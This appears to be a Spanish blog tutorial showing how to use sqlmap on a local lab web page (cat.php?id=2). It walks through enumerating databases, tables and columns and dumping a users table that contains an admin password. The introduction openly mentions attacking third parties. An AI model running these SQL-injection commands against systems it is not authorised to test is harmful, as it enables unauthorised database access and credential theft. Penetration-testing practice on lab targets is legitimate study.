Sqlmap en Kali Linux


Introducción

SqlMap es una ligera pero potente herramienta que nos ayuda encontrar vulnerabilidades web-mysql en nuestros sitios web. SqlMap lo que hace es buscar alguna forma de inyectar sql y asi obtener accesos elevados. Podríamos usar esta herramienta ya sea para encontrar vulnerabilidades en nuestros sistema o para atacar a terceros. en este tutorial voy a mostrar algunos comandos basicos y una prueba de ataque y acceso a una pagina vulnerable

Instalación

1.- Vamos a obtener la bd
sqlmap -u http://192.168.8.103/cat.php?id=2 --dbs
Esto nos debe de regresar algo asi


2.- Ahora vamos a sacar las tablas de la bd photoblog que obtuvimos previamente
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog --tables
Este es el resultado


3.- Una vez obtenidas las columnas vamos a sacar las columnas de tabla users asi:
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users --columns
Este es el resultado:



4.- Una vez obtenidas las columnas vamos a sacar los registros de las columnas:
sqlmap -u http://192.168.8.103/cat.php?id=2 -D photoblog -T users -C id,login,password --dump
Listo hemos obtenido el usuario y password.
User: admin
Password: P4ssw0rd






Comentarios

Facebook Like

Entri Populer

hackear wifi con kali linux 📡

Instalar Netbeans 10 en Windows 10

Instalar netbeans 10 en ubuntu 18.04